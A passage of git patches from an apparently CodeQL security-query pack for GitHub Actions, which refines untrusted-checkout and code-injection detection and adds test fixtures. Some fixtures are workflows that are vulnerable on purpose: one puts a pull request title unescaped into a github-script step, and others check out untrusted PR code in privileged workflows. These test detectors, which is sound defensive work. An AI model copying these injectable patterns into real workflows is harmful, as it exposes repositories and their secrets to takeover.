+0000 Subject: [PATCH 130/707] Fix inputs for composite action --- action.yml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/action.yml b/action.yml index e8f13962e819..9281212ea24e 100644 --- a/action.yml +++ b/action.yml @@ -26,5 +26,8 @@ runs: env: GITHUB_TOKEN: ${{ inputs.token }} GH_TOKEN: ${{ inputs.token }} + INPUT_SOURCE-ROOT: ${{ inputs.source-root }} + INPUT_SARIF-OUTPUT: ${{ inputs.sarif-output }} + INPUT_SUITE: ${{ inputs.suite }} run: | node ${{ github.action_path }}/.github/action/dist/index.js From 8906bd96350661569f8a29a0790b6700b8aa85e6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 11:00:22 +0100 Subject: [PATCH 131/707] Bump versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 4dd2ab2866e6..7d2de60df75c 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.3 +version: 0.0.4 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 90647d422407..f36c119e7202 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.3 +version: 0.0.4 groups: - actions - queries From 8023a527a40d8dff50ec949bcba3f7ef6a76567f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 13:02:11 +0100 Subject: [PATCH 132/707] fix(untrusted_co): Do not report Reusable workflows called from pull_request --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 24 ++++- .../.github/workflows/changelog_from_prt.yml | 100 ++++++++++++++++++ .../workflows/changelog_required_prt.yml | 9 ++ 3 files changed, 128 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 1be8a6ea0f5d..b33c7325526d 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Workflows triggered on `pull_request_target` have read/write access to the base repository and access to secrets. + * @description Priveleged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem @@ -121,12 +121,26 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { } } +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent([ - "pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", - "workflow_run", "check_run", "check_suite", "workflow_call" - ]) and + ( + // The Workflow is triggered by an event other than `pull_request` + not isSingleTriggerWorkflow(w, "pull_request") + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + isSingleTriggerWorkflow(w, "workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = w.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + not isSingleTriggerWorkflow(caller, "pull_request") + ) + ) and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml new file mode 100644 index 000000000000..0ee850f183d7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml @@ -0,0 +1,100 @@ +name: changelog + +on: + workflow_call: + inputs: + create: + description: Add a log to the changelog + type: boolean + required: false + default: false + update: + description: Update the existing changelog + type: boolean + required: false + default: false + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + if: (inputs.create && failure()) || (inputs.update && success()) + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml new file mode 100644 index 000000000000..8a3b1b02a63d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml @@ -0,0 +1,9 @@ +name: '📋' + +on: + pull_request_target: + branches: [master] + +jobs: + changelog: + uses: ./.github/workflows/changelog_from_prt.yml From 9683ae35bcee5b8a9ce3118edf08ca9039cf1044 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 13:04:57 +0100 Subject: [PATCH 133/707] Add tests --- ql/test/query-tests/Security/CWE-094/CodeInjection.expected | 4 ++++ .../Security/CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 2 files changed, 8 insertions(+) diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 14b0c535ac62..2ad850548037 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -4,6 +4,7 @@ edges | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -66,6 +67,8 @@ nodes | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | @@ -205,6 +208,7 @@ subpaths | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index bdb5ae3ea556..e818ced0c1d7 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -4,6 +4,7 @@ edges | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -66,6 +67,8 @@ nodes | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | @@ -204,6 +207,7 @@ subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | From 874e45e3e526b1e35415f76b60a1a828bb4eee6d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 13:22:53 +0100 Subject: [PATCH 134/707] feat(sources): New sources This PR also adds the ability to not limit a source to a trigger event --- ql/lib/ext/trilom_file-changes-action.model.yml | 11 +++++++++++ ql/src/Security/CWE-094/PrivilegedCodeInjection.ql | 1 + 2 files changed, 12 insertions(+) create mode 100644 ql/lib/ext/trilom_file-changes-action.model.yml diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml new file mode 100644 index 000000000000..db3d37597827 --- /dev/null +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + # https://github.com/trilom/file-changes-action + # if `prNumber` is provided, the trigger event dont need to be `pull_request_target` + - ["trilom/file-changes-action", "*", "output.files", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_added", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_modified", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_removed", "*", "PR changed files"] diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 69ab240616e6..32f292f22003 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -24,6 +24,7 @@ where w = source.getNode().asExpr().getEnclosingWorkflow() and ( w instanceof ReusableWorkflow or + source.getNode().(RemoteFlowSource).getATriggerEvent() = "*" or w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, From 06747cd98b7c3d48070ae06be902940f734895cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 21 Mar 2024 14:16:11 +0100 Subject: [PATCH 135/707] Add tests for untrusted checkouts in workflow_run triggered workflows --- .../codeql/actions/dataflow/FlowSources.qll | 3 +++ .../workflow_run_untrusted_checkout.yml | 19 +++++++++++++++++++ .../CWE-829/UntrustedCheckout.expected | 2 ++ 3 files changed, 24 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 007ace43bd0c..ab2466bc41ba 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -106,7 +106,10 @@ private predicate isExternalUserControlledWorkflowRun(string context) { [ "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.display_title", + "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.head_repository\\.description", + "github\\.event\\.workflow_run\\.head_repository\\.full_name", + "github\\.event\\.workflow_run\\.head_repository\\.name", "github\\.event\\.workflow_run\\.head_commit\\.message", "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml new file mode 100644 index 000000000000..c802355d102a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml @@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index cf9d6c01d49c..dc457c6a8a7a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -20,3 +20,5 @@ | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 2ed3aceddfefcb329bf03335b4d9c6f68b08811e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 22 Mar 2024 13:32:29 +0100 Subject: [PATCH 136/707] feat(sources): Do not take triggers into consideration --- .../codeql/actions/dataflow/ExternalFlow.qll | 11 +-- .../codeql/actions/dataflow/FlowSources.qll | 38 ++------- .../dataflow/internal/DataFlowPrivate.qll | 6 +- .../internal/ExternalFlowExtensions.qll | 4 +- ql/lib/ext/TEST-RW-MODELS.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 4 +- .../ext/jitterbit_get-changed-files.model.yml | 14 ++-- ...han_pull-request-comment-trigger.model.yml | 4 +- ql/lib/ext/tj-actions_branch-names.model.yml | 6 +- ql/lib/ext/tj-actions_changed-files.model.yml | 34 ++++---- .../tj-actions_verify-changed-files.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 4 +- .../CWE-078/PrivilegedCommandInjection.ql | 10 ++- .../CWE-094/PrivilegedCodeInjection.ql | 10 ++- ql/test/library-tests/test.expected | 82 +++++++++---------- ql/test/library-tests/test.ql | 4 +- .../.github/workflows/pull_request_target.yml | 4 +- .../CWE-094/PrivilegedCodeInjection.expected | 8 ++ 24 files changed, 123 insertions(+), 138 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 08f8b6b93630..c1c93221d1af 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -8,10 +8,9 @@ private import actions * - action: Fully-qualified action name (NWO) * - version: Either '*' or a specific SHA/Tag * - output arg: To node (prefixed with either `env.` or `output.`) - * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. */ -predicate sourceModel(string action, string version, string output, string trigger, string kind) { - Extensions::sourceModel(action, version, output, trigger, kind) +predicate sourceModel(string action, string version, string output, string kind) { + Extensions::sourceModel(action, version, output, kind) } /** @@ -39,11 +38,9 @@ predicate sinkModel(string action, string version, string input, string kind) { Extensions::sinkModel(action, version, input, kind) } -predicate externallyDefinedSource( - DataFlow::Node source, string sourceType, string fieldName, string trigger -) { +predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { exists(Uses uses, string action, string version, string kind | - sourceModel(action, version, fieldName, trigger, kind) and + sourceModel(action, version, fieldName, kind) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ab2466bc41ba..699b5f6f6c3c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -18,8 +18,6 @@ abstract class RemoteFlowSource extends SourceNode { /** Gets a string that describes the type of this remote flow source. */ abstract string getSourceType(); - abstract string getATriggerEvent(); - override string getThreatModel() { result = "remote" } } @@ -122,33 +120,20 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } private class EventSource extends RemoteFlowSource { - string trigger; - EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | - trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) - or - trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and - isExternalUserControlledPullRequest(context) - or - trigger = ["pull_request_review"] and isExternalUserControlledReview(context) - or - trigger = ["pull_request_review_comment", "issue_comment", "discussion_comment"] and - isExternalUserControlledComment(context) - or - trigger = ["gollum"] and isExternalUserControlledGollum(context) - or - trigger = ["push"] and isExternalUserControlledCommit(context) - or - trigger = ["discussion", "discussion_comment"] and isExternalUserControlledDiscussion(context) - or - trigger = ["workflow_run"] and isExternalUserControlledWorkflowRun(context) + isExternalUserControlledIssue(context) or + isExternalUserControlledPullRequest(context) or + isExternalUserControlledReview(context) or + isExternalUserControlledComment(context) or + isExternalUserControlledGollum(context) or + isExternalUserControlledCommit(context) or + isExternalUserControlledDiscussion(context) or + isExternalUserControlledWorkflowRun(context) ) } override string getSourceType() { result = "User-controlled events" } - - override string getATriggerEvent() { result = trigger } } /** @@ -156,13 +141,10 @@ private class EventSource extends RemoteFlowSource { */ private class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; - string trigger; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _, trigger) } + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } override string getSourceType() { result = sourceType } - - override string getATriggerEvent() { result = trigger } } /** @@ -174,6 +156,4 @@ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionInputSource() { c.getAnInput() = this.asExpr() } override string getSourceType() { result = "Composite action input" } - - override string getATriggerEvent() { result = "*" } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index f1657717e04f..11b8bf94bca5 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -175,7 +175,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, StepsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom @@ -192,7 +192,7 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { */ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, NeedsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom @@ -232,7 +232,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or astTo.getTarget() = astFrom ) ) diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 93ec64b059e5..89cf4de02616 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,9 +5,7 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel( - string action, string version, string output, string trigger, string kind -); +extensible predicate sourceModel(string action, string version, string output, string kind); /** * Holds if a summary model exists for the given parameters. diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml index 44897ef3311e..4ff387b1c5ac 100644 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml +++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -9,7 +9,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "*", "Foo"] + - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml 